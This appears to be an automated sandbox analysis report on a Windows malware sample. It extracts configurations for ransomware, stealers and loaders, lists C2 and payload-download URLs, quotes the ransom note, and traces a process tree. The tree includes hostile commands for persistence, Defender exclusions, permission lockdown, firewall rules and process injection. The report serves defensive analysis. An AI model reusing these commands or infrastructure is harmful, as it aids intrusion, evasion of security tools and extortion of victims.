Analysis
max time kernel: 300s
max time network: 306s
platform: windows10-1703_x64
resource: win10-20230915-en
resource tags: arch:x64, arch:x86, image:win10-20230915-en, locale:en-us, os:windows10-1703-x64, system
submitted: 15-10-2023 22:23
Static task: static1
Behavioral task: behavioral1
Sample: a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Resource: win7-20230831-en
Behavioral task: behavioral2
Sample: a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Resource: win10-20230915-en
General
Target: a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Size: 238KB
MD5: 94bb161392626d940ad4e026024ffdd2
SHA1: aaafe0247760530a93f7802846ac7ab00cee5940
SHA256: a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271
SHA512: 02e2ec821b0a0e8b03bfa92d7f8c85fc8d29b3090ce745284d1d32ca4961eb295686be3be7d3de86ad1f6ec757fe84eec7daefb05eb9a42c4e0a24432d1a184c
SSDEEP: 3072:9ecebWhRvPPHknr2H3bXuoDuJB2how57qRTpg0TT:4/ChRvPc0XqRpT
Malware Config
Extracted: smokeloader 2022
Extracted: djvu
http://zexeq.com/raud/get.php
extension: .pthh
offline_id: 43WPLl8Cnh3dZoiWhf8tP8Q9CrMBVUL2dwHB2Rt1
payload_url: http://colisumy.com/dl/build2.exe, http://zexeq.com/files/1/build3.exe
ransomnote:
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-dHFDYXqlkk Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0808ASUDr
Extracted: redline
LogsDiller Cloud (TG: @logsdillabot)
146.59.161.13:39199
Extracted: amadey 3.87
http://79.137.192.18/9bDc8sQ/index.php
install_dir: 577f58beff
install_file: yiueea.exe
strings_key: a5085075a537f09dec81cc154ec0af4d
Extracted: smokeloader pub1
Extracted: smokeloader up3
Signatures
Detected Djvu ransomware 9 IoCs
Detects DLL dropped by Raspberry Robin. 6 IoCs
Raspberry Robin.
Djvu Ransomware
Ransomware which is a variant of the STOP family.
Glupteba payload 8 IoCs
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 2 IoCs
resource yara_rule
behavioral2/memory/308-49-0x0000000000400000-0x000000000043E000-memory.dmp family_redline
behavioral2/memory/2788-246-0x0000000000400000-0x000000000045A000-memory.dmp family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess 21 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\d21cbe21e38b385a41a68c5e6dd32f4c.exe = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C94.exe = "0" C94.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ F1C3.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mi.exe
Downloads MZ/PE file
Drops file in Drivers directory 4 IoCs
description ioc Process
File created C:\Windows\System32\drivers\etc\hosts latestX.exe
File created C:\Windows\System32\drivers\etc\hosts mi.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
File created C:\Windows\System32\drivers\etc\hosts updater.exe
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process
4848 netsh.exe
4064 netsh.exe
Stops running service(s) 3 TTPs
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mi.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mi.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F1C3.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F1C3.exe
Deletes itself 1 IoCs
pid Process
1792 Explorer.EXE
Executes dropped EXE 38 IoCs
pid Process
4616 ED7D.exe
4420 ED7D.exe
4320 F1C3.exe
1256 F520.exe
2292 FC56.exe
4492 yiueea.exe
3828 1D5.exe
3600 C94.exe
4692 toolspub2.exe
4992 toolspub2.exe
2952 d21cbe21e38b385a41a68c5e6dd32f4c.exe
1164 latestX.exe
2824 updater.exe
3188 ED7D.exe
4400 ED7D.exe
1140 build2.exe
2780 d21cbe21e38b385a41a68c5e6dd32f4c.exe
5032 build2.exe
4352 build3.exe
1380 mi.exe
4712 C94.exe
2780 d21cbe21e38b385a41a68c5e6dd32f4c.exe
2880 yiueea.exe
2128 mstsca.exe
1668 bewehsf
4276 htwehsf
2824 updater.exe
5012 yiueea.exe
3708 updater.exe
1524 csrss.exe
2072 yiueea.exe
3656 injector.exe
1800 mstsca.exe
3428 windefender.exe
1340 windefender.exe
3080 yiueea.exe
4196 mstsca.exe
2008 mstsca.exe
Loads dropped DLL 3 IoCs
pid Process
3848 regsvr32.exe
5032 build2.exe
5032 build2.exe
Modifies file permissions 1 TTPs 1 IoCs
pid Process
3192 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process
Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Key opened \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C94.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\54b9847a-dfce-46fb-8324-df75c65cd976\\ED7D.exe\" --AutoStart" ED7D.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" d21cbe21e38b385a41a68c5e6dd32f4c.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
description ioc Process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F1C3.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mi.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
20 api.2ip.ua
21 api.2ip.ua
60 api.2ip.ua
62 api.2ip.ua
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
description ioc Process
File opened for modification \??\WinMonFS csrss.exe
Drops file in System32 directory 18 IoCs
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process
4320 F1C3.exe
1380 mi.exe
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target
PID 4616 set thread context of 4420 4616 ED7D.exe 71
PID 1256 set thread context of 308 1256 F520.exe 77
PID 4692 set thread context of 4992 4692 toolspub2.exe 93
PID 4320 set thread context of 2788 4320 powershell.exe 101
PID 3188 set thread context of 4400 3188 ED7D.exe 110
PID 1140 set thread context of 5032 1140 build2.exe 113
PID 2780 set thread context of 4352 2780 d21cbe21e38b385a41a68c5e6dd32f4c.exe 116
PID 2824 set thread context of 3660 2824 updater.exe 208
PID 2824 set thread context of 1528 2824 updater.exe 209
PID 2128 set thread context of 1800 2128 mstsca.exe 242
PID 4196 set thread context of 2008 4196 mstsca.exe 255
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process
File opened (read-only) \??\VBoxMiniRdrDN d21cbe21e38b385a41a68c5e6dd32f4c.exe
File opened (read-only) \??\VBoxMiniRdrDN C94.exe
Drops file in Program Files directory 4 IoCs
description ioc Process
File created C:\Program Files\Google\Chrome\updater.exe latestX.exe
File created C:\Program Files\Google\Chrome\updater.exe mi.exe
File created C:\Program Files\Google\Libs\WR64.sys updater.exe
File created C:\Program Files\Google\Libs\WR64.sys updater.exe
Drops file in Windows directory 6 IoCs
description ioc Process
File opened for modification C:\Windows\rss d21cbe21e38b385a41a68c5e6dd32f4c.exe
File created C:\Windows\rss\csrss.exe d21cbe21e38b385a41a68c5e6dd32f4c.exe
File opened for modification C:\Windows\rss C94.exe
File created C:\Windows\rss\csrss.exe C94.exe
File created C:\Windows\windefender.exe csrss.exe
File opened for modification C:\Windows\windefender.exe csrss.exe
Launches sc.exe 21 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
808 sc.exe 4760 sc.exe 3656 sc.exe 4596 sc.exe 3312 sc.exe 4468 sc.exe 1716 sc.exe 1520 sc.exe 2756 sc.exe 2844 sc.exe 3780 sc.exe 3644 sc.exe 2824 sc.exe 3848 sc.exe 4068 sc.exe 4152 sc.exe 4384 sc.exe 304 sc.exe 3960 sc.exe 3308 sc.exe 688 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
pid pid_target Process procid_target
3416 1256 WerFault.exe 73
3528 5032 WerFault.exe 113
2360 4276 WerFault.exe 146
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1D5.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bewehsf
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bewehsf
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1D5.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1D5.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bewehsf
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
2660 schtasks.exe
1860 schtasks.exe
2468 schtasks.exe
4312 schtasks.exe
1748 schtasks.exe
1192 schtasks.exe
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process
1792 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs
pid Process
636 Process not Found
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process
4676 a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
1792 Explorer.EXE
1792 Explorer.EXE
1792 Explorer.EXE
1792 Explorer.EXE
3828 1D5.exe
1668 bewehsf
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1792 wrote to memory of 4616 1792 Explorer.EXE 70 PID 1792 wrote to memory of 4616 1792 Explorer.EXE 70 PID 1792 wrote to memory of 4616 1792 Explorer.EXE 70 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 4616 wrote to memory of 4420 4616 ED7D.exe 71 PID 1792 wrote to memory of 4320 1792 Explorer.EXE 72 PID 1792 wrote to memory of 4320 1792 Explorer.EXE 72 PID 1792 wrote to memory of 4320 1792 Explorer.EXE 72 PID 1792 wrote to memory of 1256 1792 Explorer.EXE 73 PID 1792 wrote to memory of 1256 1792 Explorer.EXE 73 PID 1792 wrote to memory of 1256 1792 Explorer.EXE 73 PID 1792 wrote to memory of 604 1792 Explorer.EXE 75 PID 1792 wrote to memory of 604 1792 Explorer.EXE 75 PID 604 wrote to memory of 3848 604 regsvr32.exe 76 PID 604 wrote to memory of 3848 604 regsvr32.exe 76 PID 604 wrote to memory of 3848 604 regsvr32.exe 76 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1256 wrote to memory of 308 1256 F520.exe 77 PID 1792 wrote to memory of 2292 1792 Explorer.EXE 79 PID 1792 wrote to memory of 2292 1792 Explorer.EXE 79 PID 1792 wrote to memory of 2292 1792 Explorer.EXE 79 PID 2292 wrote to memory of 4492 2292 FC56.exe 81 PID 2292 wrote to memory of 4492 2292 FC56.exe 81 PID 2292 wrote to memory of 4492 2292 FC56.exe 81 PID 4492 
wrote to memory of 2468 4492 yiueea.exe 82 PID 4492 wrote to memory of 2468 4492 yiueea.exe 82 PID 4492 wrote to memory of 2468 4492 yiueea.exe 82 PID 4492 wrote to memory of 360 4492 yiueea.exe 83 PID 4492 wrote to memory of 360 4492 yiueea.exe 83 PID 4492 wrote to memory of 360 4492 yiueea.exe 83 PID 1792 wrote to memory of 3828 1792 Explorer.EXE 85 PID 1792 wrote to memory of 3828 1792 Explorer.EXE 85 PID 1792 wrote to memory of 3828 1792 Explorer.EXE 85 PID 360 wrote to memory of 3192 360 cmd.exe 105 PID 360 wrote to memory of 3192 360 cmd.exe 105 PID 360 wrote to memory of 3192 360 cmd.exe 105 PID 360 wrote to memory of 4728 360 cmd.exe 88 PID 360 wrote to memory of 4728 360 cmd.exe 88 PID 360 wrote to memory of 4728 360 cmd.exe 88 PID 1792 wrote to memory of 3600 1792 Explorer.EXE 89 PID 1792 wrote to memory of 3600 1792 Explorer.EXE 89 PID 1792 wrote to memory of 3600 1792 Explorer.EXE 89 PID 360 wrote to memory of 5080 360 cmd.exe 186 PID 360 wrote to memory of 5080 360 cmd.exe 186 PID 360 wrote to memory of 5080 360 cmd.exe 186 PID 4492 wrote to memory of 4692 4492 yiueea.exe 92 PID 4492 wrote to memory of 4692 4492 yiueea.exe 92 PID 4492 wrote to memory of 4692 4492 yiueea.exe 92 PID 1792 wrote to memory of 4428 1792 Explorer.EXE 91 PID 1792 wrote to memory of 4428 1792 Explorer.EXE 91 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
outlook_office_path 1 IoCs
description: Key opened | ioc: \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Process: explorer.exe
outlook_win_path 1 IoCs
description: Key opened | ioc: \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Process: explorer.exe
Processes
(indented by parent process; the command line is shown where it differs from the image path)
PID 1792: C:\Windows\Explorer.EXE
  - Deletes itself
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID 4676: C:\Users\Admin\AppData\Local\Temp\a73ee8f46c7caf4da7ea6a92dc0a11d58757a83e1b5b9c3723b49690fc238271.exe
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
  PID 4616: C:\Users\Admin\AppData\Local\Temp\ED7D.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID 4420: C:\Users\Admin\AppData\Local\Temp\ED7D.exe
      - Executes dropped EXE
      - Adds Run key to start application
      PID 3192: C:\Windows\SysWOW64\icacls.exe
        cmd: icacls "C:\Users\Admin\AppData\Local\54b9847a-dfce-46fb-8324-df75c65cd976" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        - Modifies file permissions
      PID 3188: C:\Users\Admin\AppData\Local\Temp\ED7D.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\ED7D.exe" --Admin IsNotAutoStart IsNotTask
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        PID 4400: C:\Users\Admin\AppData\Local\Temp\ED7D.exe
          cmd: "C:\Users\Admin\AppData\Local\Temp\ED7D.exe" --Admin IsNotAutoStart IsNotTask
          - Executes dropped EXE
          PID 1140: C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build2.exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            PID 5032: C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build2.exe
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
              PID 3528: C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 1712
                - Program crash
          PID 2780: C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build3.exe
            PID 4352: C:\Users\Admin\AppData\Local\892c6b37-e970-434c-82bf-0d6c8d60653e\build3.exe
              - Executes dropped EXE
              PID 4312: C:\Windows\SysWOW64\schtasks.exe
                cmd: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                - Creates scheduled task(s)
  PID 4320: C:\Users\Admin\AppData\Local\Temp\F1C3.exe
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID 2788: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      - Suspicious use of AdjustPrivilegeToken
  PID 1256: C:\Users\Admin\AppData\Local\Temp\F520.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID 308: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      - Suspicious use of AdjustPrivilegeToken
      PID 1380: C:\Users\Admin\AppData\Local\Temp\mi.exe
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Drops file in Drivers directory
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Drops file in Program Files directory
    PID 3416: C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 140
      - Program crash
  PID 604: C:\Windows\system32\regsvr32.exe
    cmd: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F86D.dll
    - Suspicious use of WriteProcessMemory
    PID 3848: C:\Windows\SysWOW64\regsvr32.exe
      cmd: /s C:\Users\Admin\AppData\Local\Temp\F86D.dll
      - Loads dropped DLL
  PID 2292: C:\Users\Admin\AppData\Local\Temp\FC56.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID 4492: C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID 2468: C:\Windows\SysWOW64\schtasks.exe
        cmd: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F
        - Creates scheduled task(s)
      PID 360: C:\Windows\SysWOW64\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit
        - Suspicious use of WriteProcessMemory
        PID 3192: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        PID 4728: C:\Windows\SysWOW64\cacls.exe
          cmd: CACLS "yiueea.exe" /P "Admin:N"
        PID 5080: C:\Windows\SysWOW64\cacls.exe
          cmd: CACLS "yiueea.exe" /P "Admin:R" /E
        PID 4084: C:\Windows\SysWOW64\cacls.exe
          cmd: CACLS "..\577f58beff" /P "Admin:N"
        PID 3020: C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        PID 660: C:\Windows\SysWOW64\cacls.exe
          cmd: CACLS "..\577f58beff" /P "Admin:R" /E
      PID 4692: C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        PID 4992: C:\Users\Admin\AppData\Local\Temp\1000114001\toolspub2.exe
          - Executes dropped EXE
      PID 2952: C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe
        - Executes dropped EXE
        PID 3428: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmd: powershell -nologo -noprofile
          - Suspicious use of AdjustPrivilegeToken
        PID 2780: C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe
          - Windows security bypass
          - Executes dropped EXE
          - Windows security modification
          - Adds Run key to start application
          - Suspicious use of SetThreadContext
          - Checks for VirtualBox DLLs, possible anti-VM trick
          - Drops file in Windows directory
          - Modifies data under HKEY_USERS
          PID 4588: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          PID 3208: C:\Windows\System32\cmd.exe
            cmd: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            PID 4848: C:\Windows\system32\netsh.exe
              cmd: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              - Modifies Windows Firewall
              - Modifies data under HKEY_USERS
          PID 1996: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          PID 3648: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            cmd: powershell -nologo -noprofile
            - Drops file in System32 directory
            - Modifies data under HKEY_USERS
          PID 1524: C:\Windows\rss\csrss.exe
            - Executes dropped EXE
            - Adds Run key to start application
            - Manipulates WinMonFS driver.
            - Drops file in Windows directory
            - Modifies data under HKEY_USERS
            PID 4928: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
            PID 1192: C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)
            PID 236: C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /delete /tn ScheduledUpdate /f
            PID 2008: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
            PID 512: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmd: powershell -nologo -noprofile
              - Drops file in System32 directory
              - Modifies data under HKEY_USERS
            PID 3656: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
              cmd: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
              - Executes dropped EXE
            PID 1860: C:\Windows\SYSTEM32\schtasks.exe
              cmd: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              - Creates scheduled task(s)
            PID 3428: C:\Windows\windefender.exe
              - Executes dropped EXE
              PID 3240: C:\Windows\SysWOW64\cmd.exe
                cmd: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                PID 3312: C:\Windows\SysWOW64\sc.exe
                  cmd: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                  - Launches sc.exe
      PID 1164: C:\Users\Admin\AppData\Local\Temp\1000116001\latestX.exe
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Drops file in Drivers directory
        - Executes dropped EXE
        - Drops file in Program Files directory
  PID 3828: C:\Users\Admin\AppData\Local\Temp\1D5.exe
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
  PID 3600: C:\Users\Admin\AppData\Local\Temp\C94.exe
    - Executes dropped EXE
    PID 4188: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell -nologo -noprofile
      - Suspicious use of AdjustPrivilegeToken
    PID 4712: C:\Users\Admin\AppData\Local\Temp\C94.exe
      - Windows security bypass
      - Executes dropped EXE
      - Windows security modification
      - Adds Run key to start application
